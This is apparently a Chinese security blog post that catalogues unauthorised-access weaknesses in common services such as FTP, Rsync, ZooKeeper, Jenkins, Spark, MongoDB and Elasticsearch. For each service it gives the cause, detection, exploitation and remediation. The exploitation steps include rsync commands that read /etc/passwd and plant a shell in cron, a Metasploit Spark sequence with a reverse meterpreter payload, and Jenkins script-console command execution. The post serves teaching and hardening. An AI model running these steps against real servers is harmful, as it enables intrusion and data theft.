未授权访问漏洞总结

以下总结了常见的未授权访问漏洞,还在持续更新中,遇到就会补充。欢迎大家关注~

目录

FTP未授权访问(21)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

LDAP未授权访问(389)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

Rsync未授权访问(873)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

ZooKeeper未授权访问(2181)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

 Docker未授权访问(2375)

Docker Registry未授权访问(5000)

漏洞原理

漏洞利用

漏洞修复

Kibana未授权访问(5601)

漏洞原理

漏洞利用

漏洞修复

VNC未授权访问(5900、5901)

漏洞原理

漏洞检测

漏洞利用

修复方法

CouchDB未授权访问(5984)

漏洞原理

漏洞利用

漏洞修复

Apache Spark未授权访问(6066、8081、8082)

漏洞原理

漏洞检测

漏洞利用

漏洞修复

Redis未授权访问(6379)

Weblogic未授权访问(7001)

 JBOSS未授权访问(8080)

Jenkins未授权访问(8080)

漏洞原理

漏洞利用

漏洞修复

Kubernetes API Server未授权(8080、10250)

漏洞原理

漏洞利用

漏洞修复

Active MQ未授权访问(8161)

漏洞原理

漏洞利用

漏洞修复

Jupyter Notebook未授权访问(8888)

漏洞原理

漏洞利用

靶场搭建

漏洞利用

漏洞修复

Elasticsearch未授权访问(9200、9300)

漏洞原理

漏洞利用

漏洞修复

Zabbix未授权访问(10051)

漏洞原理

漏洞利用

漏洞修复

 Memcached未授权访问(11211)

漏洞原理

漏洞利用

漏洞修复

RabbitMQ未授权访问(15672、15692、25672)

漏洞原理

漏洞利用

漏洞修复

MongoDB未授权访问(27017)

漏洞原理

漏洞利用

靶场搭建

漏洞利用

漏洞修复

NFS未授权访问(2049、20048)

漏洞原理

漏洞利用

漏洞修复

Dubbo未授权访问(28096)

漏洞原理

漏洞利用

漏洞修复

Druid未授权访问

漏洞原理

漏洞利用

漏洞修复

Solr未授权访问

漏洞原理

漏洞利用

SpringBoot Actuator 未授权访问

漏洞原理

漏洞利用

漏洞修复

SwaggerUI未授权访问

漏洞利用

修复方法

 Harbor未授权添加管理员漏洞

漏洞原理


FTP未授权访问(21)

FTP即文件传输协议,使用客户/服务器模式与使用 TCP 传输,属于网络传输协议的应用层,默认使用20、21号两个端口,一个数据端口和一个命令端口,端口20是数据端口,用于文件在客户端和服务器之间传输数据流。端口21是命令端口,用于传输控制流,接受客户端发出的相关FTP命令与参数。

漏洞原理

由于FTP使用弱口令或者启用了匿名登录功能,容易被攻击者攻击,发生恶意文件上传或更严重的入侵行为。

漏洞检测

端口扫描检测,可以使用nmap工具。

漏洞利用

使用匿名用户连接

[root@centos7 vsftpd]# ftp 192.168.75.122
Connected to 192.168.75.122(192.168.75.122).
220 (vsFTPd 3.0.2)
Name (192.168.75.122:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/"

有关于FTP匿名登录利用的有一个VSFTPD2.3.4笑脸漏洞:FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透_ftp匿名登录漏洞-CSDN博客

关于这个漏洞,只要用户输入的用户名包含连续的:)字符,就会自动在6200端口打开一个后门。

漏洞修复

  • 禁止匿名登录
  • 配置强密码

LDAP未授权访问(389)

LDAP即轻型目录访问协议,默认使用389端口,LDAP底层一般使用TCP或UDP作为传输协议。目录服务是一个特殊的数据库,是一种以树状结构的目录数据库为基础。

漏洞原理

未对LDAP的访问进行密码验证,导致未授权访问。

漏洞检测

检测脚本参考

# python
# _*_  coding:utf-8 _*_
from ldap3 import Connection,Server,ALL
def ldap_anonymous(ip):
    try:
        server = Server(ip,get_info=ALL,connect_timeout=1)
        conn = Connection(server, auto_bind=True)
        print "[+] ldap login for anonymous"
        conn.closed
    except:
        #pass
        print '[-] checking for ldap anonymous fail'

漏洞利用

使用LdapBrowser直接连入,获取敏感信息。

LDAP是一个用于浏览和管理LDAP服务器的工具。

漏洞修复

  • 修改LDAP的ACL(访问控制列表),禁止匿名访问
  • 设置LDAP访问白名单或黑名单

Rsync未授权访问(873)

Rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAM快速同步多台主机间的文件和目录,默认运行在873端口。

漏洞原理

由于rsync的配置不当,导致允许任何人未授权访问rsync,上传本地文件,下载服务器文件等。

漏洞检测

  • 端口扫描
  • 或者在kali使用rsync命令进行检测
rsync rsync://ip:873/

漏洞利用

可以直接使用rsync工具进行利用

#利用rsync下载passwd文件
rsync rsync://ip:873/src/etc/passwd ./
#查看下载的passwd文件
cat passwd

#利用rsync写入shell文件
rsync -av shell rsync://ip:873/src/etc/cron.d/shell

漏洞修复

更改rsync默认配置文件/etc/rsyncd.conf,添加或修改参数:

  • 访问控制;设置host allow,限制允许访问主机的IP。

  • 权限控制;设置read only,将模块设置成只读。

  • 访问认证;设置auth、secrets,认证成功才能调用服务。

  • 模块隐藏;设置list,将模块隐藏。

ZooKeeper未授权访问(2181)

ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。

漏洞原理

ZooKeeper默认开放2181端口,没有对ZooKeeper进行访问控制,攻击者可通过执行envi命令获得系统大量的敏感信息包括系统名称、Java环境等,任意用户在网络可达的情况下可以进行未授权读取数据甚至杀死服务。

漏洞检测

使用nmap扫描端口

漏洞利用

#列出连接的客户端的统计信息
stat |ncat ip 2181

#测试服务器是否正常运行
echo ruok |ncat ip 2181

#列出未完成的请求
echo reqs |ncat ip 2181

#打印有关服务环境的详细信息
echo envi |ncat ip 2181

#列出未完成的会话和临时节点
echo dump |ncat ip 2181

漏洞修复

  • 为ZooKeeper配置相应的访问权限
  • 设置防火墙策略
  • 禁止把ZooKeeper直接暴露在公网

 Docker未授权访问(2375)

Docker未授权访问漏洞详解-CSDN博客

Docker Registry未授权访问(5000)

漏洞原理

默认5000端口,开放远程API,可以docker命令,通过url操作docker。

漏洞利用

端口扫描检测

#获取仓库列表
http://ip:5000/v2/_catalog

#获取指定仓库中镜像的tags列表
http://ip:5000/v2/geoglobe-servicemgr/tags/list

漏洞修复

设置ACL,只允许信任ip进行连接。

Kibana未授权访问(5601)

Kibana 是一款开源的数据分析和可视化平台,它是 Elastic Stack 成员之一,设计用于和 Elasticsearch 协作。可以使用 Kibana 对 Elasticsearch 索引中的数据进行搜索、查看、交互操作。

漏洞原理

kibana没有做安全的登录认证,外部能够随意访问数据,造成数据泄露。

漏洞利用

未授权访问的页面,无需账号密码可以直接登录。

http://192.168.126.130:5601/

https://192.168.126.130/app/kibana#

http://192.168.126.130:5601/app/kibana#/

漏洞修复

  • 设置kibana监听本地地址,并设置ElasticSearch登录的账号和密码;
  • 设置防火墙策略,限定IP访问服务;

VNC未授权访问(5900、5901)

VNC是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。

漏洞原理

默认端口为5900、5901.VNC未授权访问可以造成恶意用户直接控制受控主机。

漏洞检测

检测可以使用nmap进行扫描,查看是否开放5900、5901端口。

可以使用msfconsole工具检测模块进行批量检测

(1) 在 kali 下运行 msfconsolemsfconsole。

(2) 调用 VNC 未授权检测模块use auxiliary/scanner/vnc/vnxnoneauth。

(3) 显示有哪些选项show options。

(4) 设置地址段set rhosts ip 或 段。

(5) 设置线程set threads 50。

(6) 开始扫描run。

漏洞利用

直接使用VNC客户端输入目标服务器IP进行连接即可,连接成功可以控制目标服务器。

修复方法

(1) 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码。

(2) 以最小权限的普通用户身份运行操作系统。

CouchDB未授权访问(5984)

Apache CouchDB 是一个开源数据库,默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。

漏洞原理

HTTP Server默认开启,且没有进行验证,绑定在0.0.0.0上,所有用户均可以通过API访问导致未授权访问。在官方配置文档中对HTTP Server的配置有WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多用户都没有这么配置,导致漏洞产生。

漏洞利用

使用nmap扫描端口

然后未授权访问其页面,也可以通过curl拉取页面信息

curl ip:5984/_config

漏洞修复

  • 指定CouchDB绑定的IP:在 /etc/couchdb/local.ini 文件中找到 “bind_address = 0.0.0.0” ,把 0.0.0.0 修改为 127.0.0.1,修改后只有本机才能访问。
  • 设置访问密码:在 /etc/couchdb/local.ini 中找到“[admins]”字段配置密码。
  • 设置www-authenticate,强制认证。

Apache Spark未授权访问(6066、8081、8082)

Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。

漏洞原理

如果管理节点未启动访问控制,攻击者可以在集群中执行任意代码。该漏洞的本质是未授权用户可以向master节点提交一个应用,master节点会分发给slave节点执行应用。如果应用中包含恶意代码,会导致任意代码执行,威胁spark集群整体的安全性。

漏洞检测

nmap扫描开放端口

漏洞利用

使用msf工具进行getshell

use exploit/linux/http/spark_unauth_rce

set payload java/meterpreter/reverse_tcp

set rhost 目标ip

set rport 6066

set lhost 攻击机ip

set lport 4444

set srvhost 攻击机ip

set srvport 8080

exploit

漏洞修复

  • 对外关闭敏感端口;
  • 配置用户权限认证;

Redis未授权访问(6379)

Redis未授权访问漏洞详解(全面)_redis未授权访问漏洞编号-CSDN博客

Weblogic未授权访问(7001)

Weblogic常见漏洞详解_weblogic漏洞-CSDN博客

 JBOSS未授权访问(8080)

JBOSS未授权漏洞漏洞总结-CSDN博客

Jenkins未授权访问(8080)

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。

漏洞原理

默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。

漏洞利用

使用nmap进行端口扫描

输入url,进行未授权访问

http://ip:8080/manage

http://ip:8080/script

然后在后台页面执行系统命令

#命令格式
println 'whoami'.execute().text

漏洞修复

  • 对后台控制页面做登录验证限制;
  • 升级Jenkins至新版本;
  • 禁止把Jenkins直接暴露在公网;

Kubernetes API Server未授权(8080、10250)

Kubernetes 是一个全新的基于容器技术的分布式架构解决方案,是 Google 开源的一个容器集群管理系统,Kubernetes 简称 K8S。

漏洞原理

kubernets服务正常启动后会开放两个端口:Localhost Port(默认8080)、Secure Port(默认6443)。这两个端口都提供了API Server,一个通过web访问(而10250端口是kubelet API的HTTPS端口),一个通过kubectl客户端进行调用。如果没有进行合理的配置验证和权限,那么攻击者可以通过这两个接口去获取容器的权限。

漏洞利用

使用nmap进行端口扫描

访问https://ip/10250/pods获取环境变量、运行的容器信息、命名空间等信息。

漏洞修复

  • 进行授权认证;
  • 使用Service Account令牌;
  • 设置防火墙策略,限定IP访问服务;

Active MQ未授权访问(8161)

ActiveMQ是一款流行的开源消息服务器(就是消息中间件)。

漏洞原理

ActiveMQ服务是默认没有配置安全参数的,这导致攻击者可以在默认配置下发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。

漏洞利用

默认配置下,默认端口为8161,默认账号/密码为admin/admin

漏洞修复

  • 禁止未授权访问:修改conf/jetty.xml文件,bean id为securityConstraint下的authenticate修改值为true
  • 设置强口令:修改conf/jetty.xml文件,bean id 为securityLoginService下的conf值获取用户properties,修改用户名密码

Jupyter Notebook未授权访问(8888)

Jupyter Notebook是一个交互式笔记本,支持运行 40 多种编程语言,用于创建和共享程序文档,支持实时代码。

漏洞原理

如果管理员未配置密码,将导致未授权访问漏洞,攻击者可以在其中创建一个console并很仔细任意python代码和命令。

漏洞利用

靶场搭建

这里使用vulhub搭建漏洞

cd vulhub/jupyter/notebook-rce
docker-compose up -d

漏洞利用

访问http://ip:8888未授权进入后台页面

然后在New->Terminal创建控制台

便可以执行任意命令

漏洞修复

  • 开启身份验证,防止未经授权用户访问。
  • 访问控制策略,限制IP访问,绑定固定IP。

Elasticsearch未授权访问(9200、9300)

Elasticsearch是一款Java编写的企业级搜索服务引擎。被广泛应用于实时日志分析处理、信息检索、以及数据的多维查询和统计分析等场景。

漏洞原理

启动服务默认会开放9200端口或9300端口,可被攻击者未授权访问进行非法操作。

漏洞利用

使用nmap进行端口扫描

然后访问url,查看敏感数据

http://localhost:9200

http://localhost:9200/_cat/    //查看目录

http://localhost:9200/_cat/indices

http://localhost:9200/_river/_search //查看数据库敏感信息

http://localhost:9200/_nodes         //查看节点数据

http://localhost:9200/_plugin/head/  //web管理界面(安装了head插件)

漏洞修复

  • 访问控制策略,限制IP访问,绑定固定IP;
  • 在config/elasticsearch.yml中为9200端口设置认证等;

Zabbix未授权访问(10051)

Zabbix是一个基于web界面的提供分布式系统监视以及网络监控功能的企业级的开源解决方案。

漏洞原理

如果管理员没有更改默认配置,那么默认开放端口为10051,且无需账号密码即可登录后台。其中web后台是由PHP编写,用来显示数据库中的结果。

漏洞利用

使用nmap进行端口扫描

然后无需账号密码即可访问后台页面:http://ip:8080/zabbix.php

漏洞修复

  • 设置Zabbix的复杂口令,禁用Guest登录功能;
  • zabbix的server和agent都不要以root启动,不要设置AllowRoot=1;
  • 禁止agent执行run,不要设置EnableRemoteCommands=1;

 Memcached未授权访问(11211)

Memcached是由C语言编写的一个自由开源的、高性能的、分布式的内存对象缓存系统。内存存储可以减少数据库访问次数,提高Web应用次数。

Memcached与Redis有一些相似,它们都是内存存储数据库。不同点就是Memcached可以存储图图片、视频等数据,但是Redis可以存储list、set等的复杂数据类型,而Memcached只支持存储简答的数据类型,而且Redis只使用单核,而Memcached是可以使用多核的。总而言之,Redis适合存储小数据,Memcached适合存储大数据。

漏洞原理

依然是不需要密码即可访问。

默认端口为11211.

漏洞利用

1、使用nmap进行远程扫描,存在11211端口

nmap -p 11211 rhost-ip

2、使用telent远程登录,可以直接登录成功

telnet rhost-ip

漏洞修复

  • 如果Memcached只在内网使用,可在Memcached启动的时候指定绑定的IP地址为127.0.0.1.
memcached -d -m 1024 -u root -l 127.0.0.1-p 11211 -c 1024 -P /tmp/memcached.pid
  • 如果Memcached需要对外提供服务,可以配置iptables规则进行访问控制
#配置iptables规则,只允许192.168.15.249对11211端口进行访问
iptables -A INPUT -p tcp -s 192.168.15.249 --dport 11211 -j ACCEPT

#保存规则
service iptables save

#重启iptables
service iptables restart

RabbitMQ未授权访问(15672、15692、25672)

RabbitMQ是非常热门的一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。

漏洞原理

在默认配置下,账号密码已知,且默认端口对外开放,攻击者可以未授权访问窃取数据。

漏洞利用

使用端口扫描

访问url页面,默认账号密码都为guest

http://ip:15672

http://ip:15692

http://ip:25672

漏洞修复

  • 修改为强密码,删除默认的账号guest;
  • 禁止对外网开放,仅限于内部访问;

MongoDB未授权访问(27017)

MongoDB数据库由C++编写,主要是为了提供Web应用提供可扩展的高性能数据存储解决方案。MongoDB是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。它支持的数据结构非常松散,是类似json的bson格式,因此可以存储比较复杂的数据类型。Mongo最大的特点是它支持的查询语言非常强大,其语法有点类似于面向对象的查询语言,几乎可以实现类似关系数据库单表查询的绝大部分功能,而且还支持对数据建立索引。

漏洞原理

MongoDB数据库安装完成之后默认空口令导致攻击者无需账号就可以直接登录,进行增删改查操作。

默认端口:27017

漏洞利用

靶场搭建

攻击机:kai

靶机:Ubuntu(需要使用docker环境搭建)

1、拉取MongoDB镜像文件

docker pull mongo

2、创建容器并将MongoDB运行

docker run -d -p 27017:27017 mongo

3、查看运行端口

docker ps -a

4、攻击机扫描端口

漏洞利用

参考链接:MongoDB 未授权访问漏洞利用-CSDN博客

1、在kali里面导入MongoDB公共GPG密钥:

wget -qO - https://www.mongodb.org/static/pgp/server-5.0.asc | sudo apt-key add -

2、创建一个列表用于配置下载列表和下载源

echo "deb http://repo.mongodb.org/apt/debian buster/mongodb-org/5.0 main" | sudo tee /etc/apt/sources.list.d/mongodb-org-5.0.list

3、重新加载更新源

apt-get update

4、安装MongoDB的最新稳定版本

apt-get install -y mongodb-org

 如果这里出现libssl1.1不能下载的报错,可以更新源,然后再次进行下载。解决方法参考:解决E: Unable to correct problems, you have held broken packages.(亲测有效)-CSDN博客

5、启动MongoDB进程

systemctl start mongod

6、直接使用命令进行连接(无口令连接)

mongo --host 192.168.122.1 --port 27017

7、连接后即可查看用户、数据库等信息。

8、然后创建一个管理员账号

#切换到admin库:
> use admin
switched to db admin
 
 
#创建用户
> db.createUser(
  {
    user: "myUserAdmin",
    pwd: "Passw0rd",
    roles: [ { role: "userAdminAnyDatabase", db: "admin" } ]
  }
)
 
 
#创建成功后提示信息:Successfully added user: {
    "user" : "myUserAdmin",
    "roles" : [
        {
            "role" : "userAdminAnyDatabase",
            "db" : "admin"
        }
    ]
}

9、ssh登录系统,账号密码为上面创建账户的账号密码。

除了上面较复杂的过程,也可以使用msf集成工具进行攻击。

在探测存在27017端口后,可以使用

msf6 > use auxiliary/scanner/mongodb/mongodb_login

漏洞修复

  • 如果mongodb只需在本地使用,建议只在本地开启监听服务
  • 如果mongodb只对内网提供服务,简体禁止将MongoDB服务发布在互联网上,并在主机上通过防火墙限制访问源IP
  • 最大的漏洞成因就是可以无口令进行登录,所以建议启动基于角色的登录认证功能。

NFS未授权访问(2049、20048)

NFS是UNIX表示层协议,能让使用者访问网络别处的文件就像在使用自己计算机一样。

漏洞原理

NFS配置不当,未限制对外访问,导致共享目录泄露。

漏洞利用

#安装nfs客户端
apt install nfs-common

#查看nfs服务器上的共享目录
showmount -e ip

#挂载到本地
mount -t nfs ip:/grdata /mnt

#卸载共享目录
umount /mnt

或者在windows系统上也可以直接利用映射网络驱动器。

漏洞修复

  • 利用iptables限制端口2049和20048端口的访问,禁止外部访问;
  • 设置/etc/exports,对访问进行控

Dubbo未授权访问(28096)

Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC 实现服务的输 出和输入功能,可以和 Spring框架无缝集成。

漏洞原理

因配置不当而导致未授权访问漏洞

漏洞利用

扫描端口后直接连接进入dubbo服务

#连接进入dubbo服务
telent ip port

#查看框架情况
status -l

漏洞修复

  • 配置dubbo认证;
  • 设置防火墙策略,限定IP访问;

Druid未授权访问

Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控。

漏洞原理

首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。

漏洞利用

无需登录,即可登录Druid监控页面,访问以下url

/druid/index.html

/druid/websession.html

/druid/datasource.html

/druid/sql.html

/druid/spring.html

漏洞修复

  • 配置访问账号密码;
  • 禁止对外网开放访问;

Solr未授权访问

Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等。

漏洞原理

配置不当导致可以任意未授权访问,可查询所有数据库信息,甚至可读取系统任意文件,获取shell。

漏洞利用

访问如下url

http://xx.xx.com/solr/admin

https://xx.xx.com/solr/admin

漏洞修复

  • 配置solr访问控制权限;
  • 禁止将solr暴露在公网;

SpringBoot Actuator 未授权访问

Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。

漏洞原理

在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息,从而导致信息泄露甚至服务器被接管的事件发生。

漏洞利用

 

漏洞修复

  •     禁用/env接口;
  •     升级到SpringBoot Actuator 2.0;
  •     禁止对外开放;

SwaggerUI未授权访问

Swagger 是一个规范且完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。

漏洞利用

访问以下url

/api

/api-docs

/api-docs/swagger.json

/api.html

/api/api-docs

/api/apidocs

/api/doc

/api/swagger

/api/swagger-ui

/api/swagger-ui.html

/api/swagger-ui.html/

/api/swagger-ui.json

/api/swagger.json

/api/swagger/

/api/swagger/ui

/api/swagger/ui/

/api/swaggerui

/api/swaggerui/

/api/v1/

/api/v1/api-docs

/api/v1/apidocs

/api/v1/swagger

/api/v1/swagger-ui

/api/v1/swagger-ui.html

/api/v1/swagger-ui.json

/api/v1/swagger.json

/api/v1/swagger/

/api/v2

/api/v2/api-docs

/api/v2/apidocs

/api/v2/swagger

/api/v2/swagger-ui

/api/v2/swagger-ui.html

/api/v2/swagger-ui.json

/api/v2/swagger.json

/api/v2/swagger/

/api/v3

/apidocs

/apidocs/swagger.json

/doc.html

/docs/

/druid/index.html

/graphql

/libs/swaggerui

/libs/swaggerui/

/spring-security-oauth-resource/swagger-ui.html

/spring-security-rest/api/swagger-ui.html

/sw/swagger-ui.html

/swagger

/swagger-resources

/swagger-resources/configuration/security

/swagger-resources/configuration/security/

/swagger-resources/configuration/ui

/swagger-resources/configuration/ui/

/swagger-ui

/swagger-ui.html

/swagger-ui.html#/api-memory-controller

/swagger-ui.html/

/swagger-ui.json

/swagger-ui/swagger.json

/swagger.json

/swagger.yml

/swagger/

/swagger/index.html

/swagger/static/index.html

/swagger/swagger-ui.html

/swagger/ui/

/Swagger/ui/index

/swagger/ui/index

/swagger/v1/swagger.json

/swagger/v2/swagger.json

/template/swagger-ui.html

/user/swagger-ui.html

/user/swagger-ui.html/

/v1.x/swagger-ui.html

/v1/api-docs

/v1/swagger.json

/v2/api-docs

/v3/api-docs

修复方法

设置访问权限

 Harbor未授权添加管理员漏洞

漏洞原理

Harbor未授权添加任意管理员漏洞。攻击者可通过构造特定的字符串,在未授权的情况下直接创建管理员账号,从而接管Harbor镜像仓库。

参考这篇文章:Harbor未授权创建管理员漏洞(CVE-2019-16097)_harbor未授权添加管理员漏洞-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/720023.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

MacOS - 启动台多了个『卸载 Adobe Photoshop』

问题描述 今天安装好了 Adobe Ps,但是发现启动台多了个『卸载 Adobe Photoshop』强迫症又犯了,想把它干掉! 解决方案 打开访达 - 前往 - 资源库,搜索要卸载的名字就可以看到,然后移除到垃圾筐

Javaweb07-JavaBean技术和Jsp开发模式

JavaBean技术和Jsp开发模式 一.JavaBean技术 1.JavaBean的基本概念 **JavaBean组件:**与html分离且使用Java代码封装类 **JavaBean分类:**可视化JavaBean:swing 非可视化JavaBean:用于封装实体和业务逻辑 JavaBean特点&#x…

if/case条件测试语句

一 条件测试 1.1返回码 $? $? 返回码 用来哦按段命令或者脚本是否执行成功 0 true为真就是成功成立 非0 false 失败或者异常 1.2 test 命令 可以进行条件测试 然后根据返回值来判断条件是否成立 -e :exist 测试目录或者目录是否存在 -d : director…

华为北向网管NCE开发教程8(性能数据)

1接口说明 通过北向网管获取性能数据的接口,主要用PerformanceManagementMgr_I。 获取当前:getAllCurrentPMData 获取历史:getHistoryPMData Common_IHolder commonHolder new Common_IHolder(); emsSession.getManager("Performance…

itsm服务管理工具有哪些?

itsm(IT服务管理)是现代企业管理IT服务的关键框架,可帮助组织提供高效的IT服务,并确保业务持续运行。使用itsm服务管理工具是实现这一目标的关键,下面我们来看看itsm服务管理工具有哪些: 1. ServiceDesk Pl…

MyBatis中获取Mysql数据库插入记录的主键值

在MyBatis中,你可以使用多种方式获取插入记录的主键值。以下是常见的几种方法: 1. 使用 useGeneratedKeys 和 keyProperty 这是MyBatis提供的最直接的方法。在你的Mapper XML文件中,使用 useGeneratedKeys 和 keyProperty 来指定MyBatis在插…

为啥找对象千万别找大厂男,还好我不是大厂的。。

网上看到一大厂女员工发文说:找对象千万别找大厂男,理由说了一大堆,无非就是大厂男为了逃避带娃,以加班为由宁愿在工位上玩游戏也不愿回家。当然这种观点有的人赞同有的人反对。 网友精彩评论: --------------下面是今…

通过visualVM远程监控java进程

1. VisualVM 简介及功能介绍 VisualVM 是一个功能强大的工具,用于监视、分析、配置和调试 Java 应用程序的运行状态。它提供了丰富的功能来帮助开发者和运维人员理解和优化 Java 应用程序的性能。VisualVM 集成了多种 JDK 工具,并通过直观的 GUI 界面提供…

Hi3861 OpenHarmony嵌入式应用入门--ADC

本篇讲解使用ADC进行采样,并使用API将采样值转为电压。 电路原理图 通过hi-12f_v1.1.2-规格书-20211202.pdf 找到IO9对应的ADC通道 GPIO API API名称 说明 hi_u32 hi_gpio_init(hi_void); GPIO模块初始化 hi_u32 hi_gpio_set_dir(hi_gpio_idx id, hi_gpio_dir …

论文阅读笔记:Towards Higher Ranks via Adversarial Weight Pruning

论文阅读笔记:Towards Higher Ranks via Adversarial Weight Pruning 1 背景2 创新点3 方法4 模块4.1 问题表述4.2 分析高稀疏度下的权重剪枝4.3 通过SVD进行低秩逼近4.4 保持秩的对抗优化4.5 渐进式剪枝框架 5 效果5.1 和SOTA方法对比5.2 消融实验5.3 开销分析 6 结…

如何打开mobi文件?两个步骤解决

打开MOBI格式的电子书,其实相当简便。NeatReader作为一个兼容多格式多系统的电子书阅读器,对MOBI格式的支持自然不在话下。下面是使用NeatReader阅读MOBI文件的步骤: 第一步:下载并安装NeatReader: 首先,你…

彩虹PLM:引领产品生命周期管理的创新潮流

彩虹PLM:引领产品生命周期管理的创新潮流 在当今快速发展的商业环境中,产品生命周期管理(PLM)成为了企业提升竞争力、实现持续创新的关键。彩虹PLM作为业界领先的PLM解决方案,以其卓越的功能和创新的理念,引…

Python武器库开发-武器库篇之链接提取器(六十)

Python武器库开发-武器库篇之链接提取器(六十) 链接提取器介绍 链接提取器(Link Extractor)是一种用于从网页中提取链接的工具。它可以从网页的源代码中识别出所有的链接,并将这些链接提取出来。链接提取器可以用于各…

如何设置透明加密保护系统呢

设置透明加密保护系统通常涉及多个步骤,以下是一个基于参考文章信息和一般实践经验的清晰设置流程,包括分点表示和归纳: www.weaem.com 1. 需求分析 确定加密目标:明确需要加密的文件类型、存储位置和使用环境。评估安全风险&…

SQL Server 触发器

触发器是一种存储数据库过程,当数据库中发生特定事件(如插入、更新或删除操作)时,会自动调用该触发器。审核SQL Server实例的方法有很多,其中一种方法是使用审核触发器,触发器在SQL Server数据库中扮演着关…

AI发展面临的问题? —— AI对创造的重新定义

一、AI的问题描述 AI与数据安全问题:随着AI技术的发展和应用,数据安全问题日益突出。AI模型训练依赖于大量数据,而这些数据中可能包含个人隐私、商业秘密等敏感信息。如果数据在采集、存储、使用过程中处理不当,可能导致数据泄露或…

Vulnhub——AI: WEB: 2

渗透复现 (1)平台框架存在目录穿越漏洞,利用该漏洞读取敏感信息 (2)Ping功能点绕过,进行命令执行操作,反弹shell无果后,利用目录穿越漏洞遍历敏感API,读取到用户SSH登录…

自动统计一个学科领域中总共有多少研究者

问题:怎么知道一个学科领域中总共有多少研究者? 方法:学者的谷歌学术主页中会有对应的领域,以进化计算为例,进入一位进化计算学者的谷歌主页,然后进入标签“Evolutionary Computation”,只要知…

JavaScript日期处理:常见问题与解决方案

JavaScript中的日期处理是一个常见但有时又令人头疼的任务。在这篇博客文章中,我将分享一些在JavaScript中处理日期时遇到的常见问题以及它们的解决方法。 日期格式化 1.1 日期格式:yyyy-MM-dd formatDate() {var value new Date()var year value.g…

【系统架构设计师】二、操作系统知识(操作系统概述|进程管理)

目录 一、操作系统概述 1.1 操作系统定义 1.2 操作系统的功能 1.3 操作系统的分类 1.4 嵌入式操作系统主要特点 二、进程管理 2.1 进程的组成与状态 2.2 前趋图 2.3 进程资源图 2.4 进程调度 2.5进程调度算法 2.6 死锁 2.7 进程与线程 2.7.1 进程 2.7.2 线程 2…